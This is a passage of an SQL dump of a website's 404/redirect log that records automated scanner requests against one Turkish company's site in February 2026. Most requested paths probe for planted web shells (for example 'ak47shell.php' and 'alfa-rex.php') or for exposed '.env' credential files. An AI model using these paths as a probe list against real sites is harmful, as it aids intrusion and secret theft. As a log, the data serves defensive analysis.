00:00:00',301),(58375,'http://www.3s-technologies.com.tr/tr/wp-includes/js/dist',NULL,'','',1,0,'2026-02-25 19:58:24','0000-00-00 00:00:00',301),(58376,'http://www.3s-technologies.com.tr/tr/wp-includes/simplepie',NULL,'','',4,0,'2026-02-25 19:58:25','0000-00-00 00:00:00',301),(58377,'http://www.3s-technologies.com.tr/tr/jane.php',NULL,'','',1,0,'2026-02-25 19:58:27','0000-00-00 00:00:00',301),(58378,'http://www.3s-technologies.com.tr/tr/.well-known/gecko-litespeed.php',NULL,'','',1,0,'2026-02-25 19:58:34','0000-00-00 00:00:00',301),(58379,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/pwnd/as.php',NULL,'','',4,0,'2026-02-25 19:58:39','0000-00-00 00:00:00',301),(58380,'http://www.3s-technologies.com.tr/tr/admins.php',NULL,'','',1,0,'2026-02-25 19:58:43','0000-00-00 00:00:00',301),(58381,'http://www.3s-technologies.com.tr/tr/main.php',NULL,'','',1,0,'2026-02-25 19:58:45','0000-00-00 00:00:00',301),(58382,'http://www.3s-technologies.com.tr/tr/av.php',NULL,'','',10,0,'2026-02-25 19:58:49','0000-00-00 00:00:00',301),(58383,'http://3s-technologies.com.tr/tr/lb.php',NULL,'','',33,0,'2026-02-25 20:05:23','0000-00-00 00:00:00',301),(58384,'http://3s-technologies.com.tr/tr/wp-monamon.php',NULL,'','',1,0,'2026-02-25 20:05:42','0000-00-00 00:00:00',301),(58385,'http://3s-technologies.com.tr/tr/wp-content/uploads/mfw-activity-logger/csv-uploads/titaniumex.php?titanium=ex',NULL,'','',1,0,'2026-02-26 01:08:06','0000-00-00 00:00:00',301),(58386,'http://3s-technologies.com.tr/tr/wp-content/uploads/wp-bldy.php',NULL,'','',1,0,'2026-02-26 01:08:07','0000-00-00 00:00:00',301),(58387,'http://3s-technologies.com.tr/tr/combined.php',NULL,'','',4,0,'2026-02-26 01:08:08','0000-00-00 00:00:00',301),(58388,'http://3s-technologies.com.tr/tr/kodox.php',NULL,'','',2,0,'2026-02-26 01:08:09','0000-00-00 00:00:00',301),(58389,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/http/class.api.php',NULL,'','',1,0,'2026-02-26 01:08:10','0000-00-00 00:00:00',301),(58390,'http://3s-technologies.com.tr/tr/assets/onkoabak.php',NULL,'','',1,0,'2026-02-26 01:08:19','0000-00-00 00:00:00',301),(58391,'http://3s-technologies.com.tr/tr/.tmb/asp.php',NULL,'','',1,0,'2026-02-26 01:08:23','0000-00-00 00:00:00',301),(58392,'http://3s-technologies.com.tr/tr/ovaudglve.php',NULL,'','',1,0,'2026-02-26 01:08:24','0000-00-00 00:00:00',301),(58393,'http://3s-technologies.com.tr/tr/wp-includes/class-http.php',NULL,'','',1,0,'2026-02-26 01:08:28','0000-00-00 00:00:00',301),(58394,'http://3s-technologies.com.tr/tr/alfa_data/alfacgiapi/function.php',NULL,'','',1,0,'2026-02-26 01:08:30','0000-00-00 00:00:00',301),(58395,'http://3s-technologies.com.tr/tr/wp-content/themes/6x0dtmdc/fooster1337.php',NULL,'','',1,0,'2026-02-26 01:08:31','0000-00-00 00:00:00',301),(58396,'http://3s-technologies.com.tr/tr/discount_rules.php',NULL,'','',1,0,'2026-02-26 01:08:32','0000-00-00 00:00:00',301),(58397,'http://3s-technologies.com.tr/tr/pki-validation/about.php',NULL,'','',2,0,'2026-02-26 01:08:37','0000-00-00 00:00:00',301),(58398,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-block-editor-context-cookie.php',NULL,'','',1,0,'2026-02-26 01:08:38','0000-00-00 00:00:00',301),(58399,'http://3s-technologies.com.tr/tr/empty.php',NULL,'','',1,0,'2026-02-26 01:08:39','0000-00-00 00:00:00',301),(58400,'http://3s-technologies.com.tr/tr/-admin/includes/thumbs.php',NULL,'','',1,0,'2026-02-26 01:08:43','0000-00-00 00:00:00',301),(58401,'http://3s-technologies.com.tr/tr/bbpmyei/luuf.php',NULL,'','',1,0,'2026-02-26 01:08:44','0000-00-00 00:00:00',301),(58402,'http://3s-technologies.com.tr/tr/wp-includes/certificates/wp.php',NULL,'','',1,0,'2026-02-26 01:08:46','0000-00-00 00:00:00',301),(58403,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core32/poly1305/post.php',NULL,'','',1,0,'2026-02-26 01:08:47','0000-00-00 00:00:00',301),(58404,'http://3s-technologies.com.tr/tr/confag.php',NULL,'','',1,0,'2026-02-26 01:08:50','0000-00-00 00:00:00',301),(58405,'http://3s-technologies.com.tr/tr/wp-content/plugins/ern/alfa-rex.php',NULL,'','',1,0,'2026-02-26 01:08:51','0000-00-00 00:00:00',301),(58406,'http://3s-technologies.com.tr/tr/ak47shell.php',NULL,'','',2,0,'2026-02-26 01:08:52','0000-00-00 00:00:00',301),(58407,'http://3s-technologies.com.tr/tr/acme-challenge/xl2023.php',NULL,'','',1,0,'2026-02-26 01:08:56','0000-00-00 00:00:00',301),(58408,'http://3s-technologies.com.tr/tr/wp-includes/requests/cookie/theme.php__123',NULL,'','',1,0,'2026-02-26 01:08:58','0000-00-00 00:00:00',301),(58409,'http://3s-technologies.com.tr/tr/log404.php',NULL,'','',2,0,'2026-02-26 01:09:00','0000-00-00 00:00:00',301),(58410,'http://3s-technologies.com.tr/tr/.tmb/item.php',NULL,'','',1,0,'2026-02-26 01:09:04','0000-00-00 00:00:00',301),(58411,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/preferences/buy.php',NULL,'','',1,0,'2026-02-26 01:09:10','0000-00-00 00:00:00',301),(58412,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-taxonomy-sample.php',NULL,'','',1,0,'2026-02-26 01:09:10','0000-00-00 00:00:00',301),(58413,'http://3s-technologies.com.tr/tr/upgrade/fx.php',NULL,'','',1,0,'2026-02-26 01:09:11','0000-00-00 00:00:00',301),(58414,'http://3s-technologies.com.tr/tr/phocsqfz.php',NULL,'','',1,0,'2026-02-26 01:09:12','0000-00-00 00:00:00',301),(58415,'http://3s-technologies.com.tr/tr/alex-cross.php',NULL,'','',1,0,'2026-02-26 01:09:13','0000-00-00 00:00:00',301),(58416,'http://3s-technologies.com.tr/tr/wp-content/languages/themes/atomlib.php',NULL,'','',1,0,'2026-02-26 01:09:14','0000-00-00 00:00:00',301),(58417,'http://3s-technologies.com.tr/tr/bkncxqju.php',NULL,'','',1,0,'2026-02-26 01:09:15','0000-00-00 00:00:00',301),(58418,'http://3s-technologies.com.tr/db/phpmyadmin3/index.php?lang=en',NULL,'','',1,0,'2026-02-26 01:09:15','0000-00-00 00:00:00',301),(58419,'http://3s-technologies.com.tr/en/assets/contao/js/unix.php',NULL,'','',1,0,'2026-02-26 01:09:16','0000-00-00 00:00:00',301),(58420,'http://3s-technologies.com.tr/en/fw.php/text.php/images.php',NULL,'','',1,0,'2026-02-26 01:09:17','0000-00-00 00:00:00',301),(58421,'http://3s-technologies.com.tr/en/portal/kcwepiaw.php',NULL,'','',1,0,'2026-02-26 01:09:18','0000-00-00 00:00:00',301),(58422,'http://3s-technologies.com.tr/en/site/admin.php',NULL,'','',1,0,'2026-02-26 01:09:19','0000-00-00 00:00:00',301),(58423,'http://3s-technologies.com.tr/en/wp-content/20211028.php',NULL,'','',1,0,'2026-02-26 01:09:20','0000-00-00 00:00:00',301),(58424,'http://3s-technologies.com.tr/en/images/adminshell.php',NULL,'','',1,0,'2026-02-26 01:09:21','0000-00-00 00:00:00',301),(58425,'http://3s-technologies.com.tr/en/css/colors/blue/moon.php',NULL,'','',1,0,'2026-02-26 01:09:23','0000-00-00 00:00:00',301),(58426,'http://3s-technologies.com.tr/en/wp-content/plugins/not/includes/about.php',NULL,'','',1,0,'2026-02-26 01:09:23','0000-00-00 00:00:00',301),(58427,'http://3s-technologies.com.tr/en/wp-includes/caspersecurity.php',NULL,'','',1,0,'2026-02-26 01:09:24','0000-00-00 00:00:00',301),(58428,'http://3s-technologies.com.tr/en/wh.php',NULL,'','',1,0,'2026-02-26 01:09:25','0000-00-00 00:00:00',301),(58429,'http://3s-technologies.com.tr/en/zxhfwqyt.php',NULL,'','',1,0,'2026-02-26 01:09:25','0000-00-00 00:00:00',301),(58430,'http://3s-technologies.com.tr/en/ketiadfw.php',NULL,'','',1,0,'2026-02-26 01:09:26','0000-00-00 00:00:00',301),(58431,'http://3s-technologies.com.tr/en/rex/l/index.php',NULL,'','',1,0,'2026-02-26 01:09:27','0000-00-00 00:00:00',301),(58432,'http://3s-technologies.com.tr/en/wp-admin/includes/png.php',NULL,'','',1,0,'2026-02-26 01:09:27','0000-00-00 00:00:00',301),(58433,'http://3s-technologies.com.tr/en/network/checkbex.php',NULL,'','',1,0,'2026-02-26 01:09:28','0000-00-00 00:00:00',301),(58434,'http://3s-technologies.com.tr/en/wp-content/ans.php',NULL,'','',1,0,'2026-02-26 01:09:29','0000-00-00 00:00:00',301),(58435,'http://3s-technologies.com.tr/en/plugins/3rdpartyservers/ox3rdpartyservers/luuf.php',NULL,'','',1,0,'2026-02-26 01:09:30','0000-00-00 00:00:00',301),(58436,'http://3s-technologies.com.tr/en/luf.php',NULL,'','',1,0,'2026-02-26 01:09:31','0000-00-00 00:00:00',301),(58437,'http://3s-technologies.com.tr/en/hvoxejcn.php',NULL,'','',3,0,'2026-02-26 01:09:32','0000-00-00 00:00:00',301),(58438,'http://3s-technologies.com.tr/en/wp-content/themes/hello-elementor',NULL,'','',1,0,'2026-02-26 01:09:33','0000-00-00 00:00:00',301),(58439,'http://3s-technologies.com.tr/en/plugins/topxoh/wdr.php',NULL,'','',1,0,'2026-02-26 01:09:33','0000-00-00 00:00:00',301),(58440,'http://3s-technologies.com.tr/en/templatesdex.php',NULL,'','',1,0,'2026-02-26 01:09:34','0000-00-00 00:00:00',301),(58441,'http://3s-technologies.com.tr/en/vftjzsbm.php',NULL,'','',1,0,'2026-02-26 01:09:35','0000-00-00 00:00:00',301),(58442,'http://3s-technologies.com.tr/en/wp-admin/network/theme.php',NULL,'','',1,0,'2026-02-26 01:09:36','0000-00-00 00:00:00',301),(58443,'http://3s-technologies.com.tr/en/wp-includes/blocks/embed/admin.php',NULL,'','',1,0,'2026-02-26 01:09:38','0000-00-00 00:00:00',301),(58444,'http://3s-technologies.com.tr/en/template-ajax.php',NULL,'','',1,0,'2026-02-26 01:09:38','0000-00-00 00:00:00',301),(58445,'http://3s-technologies.com.tr/en/wp-includes/css/litespeed.php',NULL,'','',1,0,'2026-02-26 01:09:39','0000-00-00 00:00:00',301),(58446,'http://3s-technologies.com.tr/en/wp-content/plugins/plugin/allez.php',NULL,'','',1,0,'2026-02-26 01:09:41','0000-00-00 00:00:00',301),(58447,'http://3s-technologies.com.tr/en/wp-includes/blocks/freeform/admin.php',NULL,'','',1,0,'2026-02-26 01:09:41','0000-00-00 00:00:00',301),(58448,'http://3s-technologies.com.tr/en/assets/network.php',NULL,'','',1,0,'2026-02-26 01:09:44','0000-00-00 00:00:00',301),(58449,'http://mail.3s-technologies.com.tr/tr/wp-monamon.php',NULL,'','',1,0,'2026-02-26 07:06:59','0000-00-00 00:00:00',301),(58450,'http://mail.3s-technologies.com.tr/tr/boots.php',NULL,'','',3,0,'2026-02-26 07:08:26','0000-00-00 00:00:00',301),(58451,'http://mail.3s-technologies.com.tr/tr/logi.php',NULL,'','',3,0,'2026-02-26 07:08:26','0000-00-00 00:00:00',301),(58452,'http://3s-technologies.com.tr/tr/administrator/components/com_rokmodule/rokmodule.xml',NULL,'','',1,0,'2026-02-26 08:48:58','0000-00-00 00:00:00',301),(58453,'http://www.3s-technologies.com.tr/tr/myfile.php',NULL,'','',5,0,'2026-02-26 19:00:50','0000-00-00 00:00:00',301),(58454,'http://www.3s-technologies.com.tr/tr/work.php',NULL,'','',1,0,'2026-02-26 19:00:51','0000-00-00 00:00:00',301),(58455,'http://www.3s-technologies.com.tr/tr/pouhg.php',NULL,'','',2,0,'2026-02-26 19:00:55','0000-00-00 00:00:00',301),(58456,'http://www.3s-technologies.com.tr/tr/vgtyu.php',NULL,'','',2,0,'2026-02-26 19:00:55','0000-00-00 00:00:00',301),(58457,'http://www.3s-technologies.com.tr/tr/aq.php',NULL,'','',2,0,'2026-02-26 19:00:56','0000-00-00 00:00:00',301),(58458,'http://www.3s-technologies.com.tr/tr/x123.php',NULL,'','',1,0,'2026-02-26 19:00:58','0000-00-00 00:00:00',301),(58459,'http://www.3s-technologies.com.tr/tr/moshou.php',NULL,'','',1,0,'2026-02-26 19:01:00','0000-00-00 00:00:00',301),(58460,'http://www.3s-technologies.com.tr/tr/shas.php',NULL,'','',1,0,'2026-02-26 19:03:13','0000-00-00 00:00:00',301),(58461,'http://www.3s-technologies.com.tr/tr/xda.php',NULL,'','',2,0,'2026-02-26 19:03:19','0000-00-00 00:00:00',301),(58462,'http://www.3s-technologies.com.tr/tr/god.php',NULL,'','',2,0,'2026-02-26 19:03:37','0000-00-00 00:00:00',301),(58463,'http://www.3s-technologies.com.tr/tr/login8.php',NULL,'','',1,0,'2026-02-26 19:03:43','0000-00-00 00:00:00',301),(58464,'http://www.3s-technologies.com.tr/tr/nnyvn.php',NULL,'','',1,0,'2026-02-26 19:03:44','0000-00-00 00:00:00',301),(58465,'http://www.3s-technologies.com.tr/tr/lul.php',NULL,'','',1,0,'2026-02-26 19:03:45','0000-00-00 00:00:00',301),(58466,'http://www.3s-technologies.com.tr/tr/ya.php',NULL,'','',1,0,'2026-02-26 19:03:48','0000-00-00 00:00:00',301),(58467,'http://www.3s-technologies.com.tr/tr/wp5.php',NULL,'','',10,0,'2026-02-26 19:03:55','0000-00-00 00:00:00',301),(58468,'https://3s-technologies.com.tr/tr/storage/.env',NULL,'https://3s-technologies.com.tr/storage/.env','',9,0,'2026-02-26 19:37:52','0000-00-00 00:00:00',301),(58469,'https://3s-technologies.com.tr/tr/admin/.env.local',NULL,'https://3s-technologies.com.tr/admin/.env.local','',1,0,'2026-02-26 19:37:52','0000-00-00 00:00:00',301),(58470,'https://3s-technologies.com.tr/tr/app/.env.dev',NULL,'https://3s-technologies.com.tr/app/.env.dev','',1,0,'2026-02-26 19:37:52','0000-00-00 00:00:00',301),(58471,'https://3s-technologies.com.tr/tr/backend/.env.local',NULL,'https://3s-technologies.com.tr/backend/.env.local','',1,0,'2026-02-26 19:37:52','0000-00-00 00:00:00',301),(58472,'https://3s-technologies.com.tr/tr/admin/.env.prod',NULL,'https://3s-technologies.com.tr/admin/.env.prod','',1,0,'2026-02-26 19:37:52','0000-00-00 00:00:00',301),(58473,'https://3s-technologies.com.tr/tr/backend/.env.dev',NULL,'https://3s-technologies.com.tr/backend/.env.dev','',1,0,'2026-02-26 19:37:53','0000-00-00 00:00:00',301),(58474,'https://3s-technologies.com.tr/tr/app/.env.prod',NULL,'https://3s-technologies.com.tr/app/.env.prod','',1,0,'2026-02-26 19:37:53','0000-00-00 00:00:00',301),(58475,'https://3s-technologies.com.tr/tr/admin/.env.dev',NULL,'https://3s-technologies.com.tr/admin/.env.dev','',1,0,'2026-02-26 19:37:53','0000-00-00 00:00:00',301),(58476,'https://3s-technologies.com.tr/tr/api/.env.test',NULL,'https://3s-technologies.com.tr/api/.env.test','',1,0,'2026-02-26 19:37:53','0000-00-00 00:00:00',301),(58477,'https://3s-technologies.com.tr/tr/api/.env.dev',NULL,'https://3s-technologies.com.tr/api/.env.dev','',1,0,'2026-02-26 19:37:53','0000-00-00 00:00:00',301),(58478,'http://mail.3s-technologies.com.tr/tr/asc.php',NULL,'','',2,0,'2026-02-26 20:54:25','0000-00-00 00:00:00',301),(58479,'http://3s-technologies.com.tr/tr/aigcpsba.php',NULL,'','',1,0,'2026-02-26 21:45:25','0000-00-00 00:00:00',301),(58480,'http://3s-technologies.com.tr/tr/aqmpjaid.php',NULL,'','',1,0,'2026-02-26 21:45:27','0000-00-00 00:00:00',301),(58481,'http://3s-technologies.com.tr/tr/ivnnopon.php',NULL,'','',1,0,'2026-02-26 21:45:28','0000-00-00 00:00:00',301),(58482,'http://3s-technologies.com.tr/tr/asc.php',NULL,'','',3,0,'2026-02-27 05:54:42','0000-00-00 00:00:00',301),(58483,'http://3s-technologies.com.tr/tr/0xd.php',NULL,'','',8,0,'2026-02-27 12:47:53','0000-00-00 00:00:00',301),(58484,'http://3s-technologies.com.tr/tr/b7cdb465.php',NULL,'','',4,0,'2026-02-27 12:47:54','0000-00-00 00:00:00',301),(58485,'http://3s-technologies.com.tr/tr/wp9.php',NULL,'','',89,0,'2026-02-27 12:47:56','0000-00-00 00:00:00',301),(58486,'http://3s-technologies.com.tr/tr/ovajelmxf.php',NULL,'','',4,0,'2026-02-27 12:47:57','0000-00-00 00:00:00',301),(58487,'http://3s-technologies.com.tr/tr/bxhnfdgd.php',NULL,'','',4,0,'2026-02-27 12:47:58','0000-00-00 00:00:00',301),(58488,'http://3s-technologies.com.tr/tr/solaciousness.php',NULL,'','',1,0,'2026-02-27 12:47:59','0000-00-00 00:00:00',301),(58489,'http://3s-technologies.com.tr/tr/xigmltad.php',NULL,'','',4,0,'2026-02-27 12:48:03','0000-00-00 00:00:00',301),(58490,'http://3s-technologies.com.tr/tr/ovajckrrj.php',NULL,'','',4,0,'2026-02-27 12:48:05','0000-00-00 00:00:00',301),(58491,'http://3s-technologies.com.tr/tr/ws77.php',NULL,'','',36,0,'2026-02-27 12:48:08','0000-00-00 00:00:00',301),(58492,'http://3s-technologies.com.tr/tr/aqotrjkg.php',NULL,'','',4,0,'2026-02-27 12:48:09','0000-00-00 00:00:00',301),(58493,'http://3s-technologies.com.tr/tr/trx24.php',NULL,'','',14,0,'2026-02-27 12:48:11','0000-00-00 00:00:00',301),(58494,'http://3s-technologies.com.tr/tr/ovajkgsbb.php',NULL,'','',4,0,'2026-02-27 12:48:12','0000-00-00 00:00:00',301),(58495,'http://3s-technologies.com.tr/tr/bhigtouj.php',NULL,'','',4,0,'2026-02-27 12:48:13','0000-00-00 00:00:00',301),(58496,'http://3s-technologies.com.tr/tr/ggddssvl.php',NULL,'','',4,0,'2026-02-27 12:48:14','0000-00-00 00:00:00',301),(58497,'http://3s-technologies.com.tr/tr/uujuu.php',NULL,'','',4,0,'2026-02-27 12:48:15','0000-00-00 00:00:00',301),(58498,'http://3s-technologies.com.tr/tr/ckmtelzy.php',NULL,'','',4,0,'2026-02-27 12:48:17','0000-00-00 00:00:00',301),(58499,'http://3s-technologies.com.tr/tr/abpxrnwe.php',NULL,'','',4,0,'2026-02-27 12:48:17','0000-00-00 00:00:00',301),(58500,'http://3s-technologies.com.tr/tr/zyjhr.php',NULL,'','',4,0,'2026-02-27 12:48:22','0000-00-00 00:00:00',301),(58501,'http://3s-technologies.com.tr/tr/abalqdol.php',NULL,'','',4,0,'2026-02-27 12:48:23','0000-00-00 00:00:00',301),(58502,'http://3s-technologies.com.tr/tr/wdf.php',NULL,'','',38,0,'2026-02-27 12:48:25','0000-00-00 00:00:00',301),(58503,'http://3s-technologies.com.tr/tr/ccrheegr.php',NULL,'','',4,0,'2026-02-27 12:48:27','0000-00-00 00:00:00',301),(58504,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/cah.php',NULL,'','',5,0,'2026-02-27 14:26:24','0000-00-00 00:00:00',301),(58505,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/acp.php',NULL,'','',5,0,'2026-02-27 14:26:26','0000-00-00 00:00:00',301),(58506,'http://3s-technologies.com.tr/tr/as1337.php',NULL,'','',5,0,'2026-02-27 14:26:33','0000-00-00 00:00:00',301),(58507,'http://3s-technologies.com.tr/tr/wp-includes/admiin.php',NULL,'','',1,0,'2026-02-27 15:16:12','0000-00-00 00:00:00',301),(58508,'http://mail.3s-technologies.com.tr/tr/wpver.php',NULL,'','',3,0,'2026-02-27 16:11:10','0000-00-00 00:00:00',301),(58509,'http://mail.3s-technologies.com.tr/tr/public/hi.php',NULL,'','',5,0,'2026-02-27 16:11:12','0000-00-00 00:00:00',301),(58510,'http://mail.3s-technologies.com.tr/tr/wp-content/sallu.php',NULL,'','',1,0,'2026-02-27 16:11:15','0000-00-00 00:00:00',301),(58511,'http://mail.3s-technologies.com.tr/tr/zc-318.php',NULL,'','',3,0,'2026-02-27 16:11:16','0000-00-00 00:00:00',301),(58512,'http://mail.3s-technologies.com.tr/tr/wp-admin/sallu.php',NULL,'','',1,0,'2026-02-27 16:11:16','0000-00-00 00:00:00',301),(58513,'http://mail.3s-technologies.com.tr/tr/ebahvhhh.php',NULL,'','',3,0,'2026-02-27 16:11:20','0000-00-00 00:00:00',301),(58514,'http://mail.3s-technologies.com.tr/tr/snq.php',NULL,'','',3,0,'2026-02-27 16:11:21','0000-00-00 00:00:00',301),(58515,'http://mail.3s-technologies.com.tr/tr/public/wp-blog.php',NULL,'','',14,0,'2026-02-27 16:11:26','0000-00-00 00:00:00',301),(58516,'http://mail.3s-technologies.com.tr/tr/bsg-management/php.php',NULL,'','',3,0,'2026-02-27 16:11:29','0000-00-00 00:00:00',301),(58517,'http://mail.3s-technologies.com.tr/tr/ws61.php',NULL,'','',12,0,'2026-02-27 16:11:30','0000-00-00 00:00:00',301),(58518,'http://mail.3s-technologies.com.tr/tr/app',NULL,'','',1,0,'2026-02-27 16:11:32','0000-00-00 00:00:00',301),(58519,'http://mail.3s-technologies.com.tr/tr/ws59.php',NULL,'','',3,0,'2026-02-27 16:11:32','0000-00-00 00:00:00',301),(58520,'http://mail.3s-technologies.com.tr/tr/mamzi.php',NULL,'','',5,0,'2026-02-27 16:11:34','0000-00-00 00:00:00',301),(58521,'http://mail.3s-technologies.com.tr/tr/bb.php',NULL,'','',19,0,'2026-02-27 16:11:38','0000-00-00 00:00:00',301),(58522,'http://mail.3s-technologies.com.tr/tr/dsd.php',NULL,'','',3,0,'2026-02-27 16:11:39','0000-00-00 00:00:00',301),(58523,'http://mail.3s-technologies.com.tr/tr/guk.php',NULL,'','',3,0,'2026-02-27 16:11:40','0000-00-00 00:00:00',301),(58524,'http://mail.3s-technologies.com.tr/tr/tax.php',NULL,'','',3,0,'2026-02-27 16:11:43','0000-00-00 00:00:00',301),(58525,'http://mail.3s-technologies.com.tr/tr/brc.php',NULL,'','',3,0,'2026-02-27 16:11:45','0000-00-00 00:00:00',301),(58526,'http://mail.3s-technologies.com.tr/tr/fr/ms.php',NULL,'','',4,0,'2026-02-27 16:11:48','0000-00-00 00:00:00',301),(58527,'http://mail.3s-technologies.com.tr/tr/ws62.php',NULL,'','',5,0,'2026-02-27 16:11:56','0000-00-00 00:00:00',301),(58528,'http://mail.3s-technologies.com.tr/tr/gjm.php',NULL,'','',3,0,'2026-02-27 16:12:00','0000-00-00 00:00:00',301),(58529,'http://mail.3s-technologies.com.tr/tr/sadd.php',NULL,'','',5,0,'2026-02-27 16:12:06','0000-00-00 00:00:00',301),(58530,'http://mail.3s-technologies.com.tr/tr/nzv.php',NULL,'','',3,0,'2026-02-27 16:12:12','0000-00-00 00:00:00',301),(58531,'http://mail.3s-technologies.com.tr/tr/nhr.php',NULL,'','',3,0,'2026-02-27 16:12:14','0000-00-00 00:00:00',301),(58532,'http://mail.3s-technologies.com.tr/tr/ws79.php',NULL,'','',8,0,'2026-02-27 16:12:16','0000-00-00 00:00:00',301),(58533,'http://mail.3s-technologies.com.tr/tr/1061.php',NULL,'','',3,0,'2026-02-27 16:12:17','0000-00-00 00:00:00',301),(58534,'http://mail.3s-technologies.com.tr/tr/xmy.php',NULL,'','',3,0,'2026-02-27 16:12:23','0000-00-00 00:00:00',301),(58535,'http://mail.3s-technologies.com.tr/tr/fun.php',NULL,'','',7,0,'2026-02-27 16:12:24','0000-00-00 00:00:00',301),(58536,'http://mail.3s-technologies.com.tr/tr/wp-admin/sc.php',NULL,'','',3,0,'2026-02-27 16:12:30','0000-00-00 00:00:00',301),(58537,'http://mail.3s-technologies.com.tr/tr/rpk.php',NULL,'','',3,0,'2026-02-27 16:12:33','0000-00-00 00:00:00',301),(58538,'http://mail.3s-technologies.com.tr/tr/sxdfrt.php',NULL,'','',7,0,'2026-02-27 16:12:50','0000-00-00 00:00:00',301),(58539,'http://mail.3s-technologies.com.tr/tr/sdsa.php',NULL,'','',3,0,'2026-02-27 16:12:56','0000-00-00 00:00:00',301),(58540,'http://mail.3s-technologies.com.tr/tr/bs4.php7',NULL,'','',2,0,'2026-02-27 17:22:37','0000-00-00 00:00:00',301),(58541,'http://mail.3s-technologies.com.tr/tr/tkllu.php',NULL,'','',2,0,'2026-02-27 17:22:42','0000-00-00 00:00:00',301),(58542,'http://mail.3s-technologies.com.tr/tr/f.php7',NULL,'','',2,0,'2026-02-27 17:22:45','0000-00-00 00:00:00',301),(58543,'http://mail.3s-technologies.com.tr/tr/ayk.php',NULL,'','',17,0,'2026-02-27 17:22:47','0000-00-00 00:00:00',301),(58544,'http://mail.3s-technologies.com.tr/tr/trx24.php',NULL,'','',6,0,'2026-02-27 17:22:48','0000-00-00 00:00:00',301),(58545,'http://mail.3s-technologies.com.tr/tr/advanc.php',NULL,'','',2,0,'2026-02-27 17:22:49','0000-00-00 00:00:00',301),(58546,'http://mail.3s-technologies.com.tr/tr/ftyude.php',NULL,'','',2,0,'2026-02-27 17:22:51','0000-00-00 00:00:00',301),(58547,'http://mail.3s-technologies.com.tr/tr/wp-x.php',NULL,'','',2,0,'2026-02-27 17:22:54','0000-00-00 00:00:00',301),(58548,'http://mail.3s-technologies.com.tr/tr/leu.php',NULL,'','',1,0,'2026-02-27 17:23:00','0000-00-00 00:00:00',301),(58549,'http://mail.3s-technologies.com.tr/tr/kaduu.php',NULL,'','',1,0,'2026-02-27 17:23:10','0000-00-00 00:00:00',301),(58550,'http://mail.3s-technologies.com.tr/tr/wp-content/fot.php',NULL,'','',2,0,'2026-02-27 17:23:11','0000-00-00 00:00:00',301),(58551,'http://mail.3s-technologies.com.tr/tr/opotv.php',NULL,'','',1,0,'2026-02-27 17:23:17','0000-00-00 00:00:00',301),(58552,'http://mail.3s-technologies.com.tr/tr/pu9.php',NULL,'','',2,0,'2026-02-27 17:23:17','0000-00-00 00:00:00',301),(58553,'http://mail.3s-technologies.com.tr/tr/qoepq.php',NULL,'','',1,0,'2026-02-27 17:23:18','0000-00-00 00:00:00',301),(58554,'http://mail.3s-technologies.com.tr/tr/fodds.php',NULL,'','',1,0,'2026-02-27 17:23:19','0000-00-00 00:00:00',301),(58555,'http://mail.3s-technologies.com.tr/tr/wp-admin/network/user-new.php',NULL,'','',2,0,'2026-02-27 17:23:21','0000-00-00 00:00:00',301),(58556,'http://mail.3s-technologies.com.tr/tr/asix.php',NULL,'','',1,0,'2026-02-27 17:23:22','0000-00-00 00:00:00',301),(58557,'http://mail.3s-technologies.com.tr/tr/gems.php',NULL,'','',1,0,'2026-02-27 17:23:22','0000-00-00 00:00:00',301),(58558,'http://mail.3s-technologies.com.tr/tr/xxd.php',NULL,'','',1,0,'2026-02-27 17:23:23','0000-00-00 00:00:00',301),(58559,'http://mail.3s-technologies.com.tr/tr/aaq.php',NULL,'','',1,0,'2026-02-27 17:23:25','0000-00-00 00:00:00',301),(58560,'http://mail.3s-technologies.com.tr/tr/aki.php',NULL,'','',3,0,'2026-02-27 17:23:28','0000-00-00 00:00:00',301),(58561,'http://mail.3s-technologies.com.tr/tr/wp-admin/ms-edit.php',NULL,'','',2,0,'2026-02-27 17:23:31','0000-00-00 00:00:00',301),(58562,'http://mail.3s-technologies.com.tr/tr/wp-admin/themes.php',NULL,'','',3,0,'2026-02-27 17:23:33','0000-00-00 00:00:00',301),(58563,'http://mail.3s-technologies.com.tr/tr/daff42833e.php',NULL,'','',1,0,'2026-02-27 17:23:34','0000-00-00 00:00:00',301),(58564,'http://mail.3s-technologies.com.tr/tr/wp-content/v2_xml.php',NULL,'','',1,0,'2026-02-27 17:23:35','0000-00-00 00:00:00',301),(58565,'http://mail.3s-technologies.com.tr/tr/wp-content/bnm.php',NULL,'','',2,0,'2026-02-27 17:23:36','0000-00-00 00:00:00',301),(58566,'http://mail.3s-technologies.com.tr/tr/wp-content/ccs.php?p=',NULL,'','',1,0,'2026-02-27 17:23:36','0000-00-00 00:00:00',301),(58567,'http://mail.3s-technologies.com.tr/tr/wp-includes/ixr/pu8.php',NULL,'','',1,0,'2026-02-27 17:23:37','0000-00-00 00:00:00',301),(58568,'http://mail.3s-technologies.com.tr/tr/wp-includes/ixr/pu9.php',NULL,'','',1,0,'2026-02-27 17:23:38','0000-00-00 00:00:00',301),(58569,'http://mail.3s-technologies.com.tr/tr/wp-includes/ixr/povoy.php',NULL,'','',1,0,'2026-02-27 17:23:38','0000-00-00 00:00:00',301),(58570,'http://mail.3s-technologies.com.tr/tr/wp-includes/ixr/t00l.php',NULL,'','',1,0,'2026-02-27 17:23:39','0000-00-00 00:00:00',301),(58571,'http://mail.3s-technologies.com.tr/tr/wp-includes/ixr/rcc8.php',NULL,'','',1,0,'2026-02-27 17:23:40','0000-00-00 00:00:00',301),(58572,'http://mail.3s-technologies.com.tr/tr/wp-includes/ixr/rcc9.php',NULL,'','',1,0,'2026-02-27 17:23:40','0000-00-00 00:00:00',301),(58573,'http://mail.3s-technologies.com.tr/tr/wp-includes/ixr/xl9.php',NULL,'','',1,0,'2026-02-27 17:23:41','0000-00-00 00:00:00',301),(58574,'http://mail.3s-technologies.com.tr/tr/wp-includes/ixr/gxoxx.php',NULL,'','',1,0,'2026-02-27 17:23:42','0000-00-00 00:00:00',301),(58575,'http://mail.3s-technologies.com.tr/tr/wp-includes/ixr/g06akt.php',NULL,'','',1,0,'2026-02-27 17:23:42','0000-00-00 00:00:00',301),(58576,'http://mail.3s-technologies.com.tr/tr/wp-atom.php',NULL,'','',1,0,'2026-02-27 17:23:48','0000-00-00 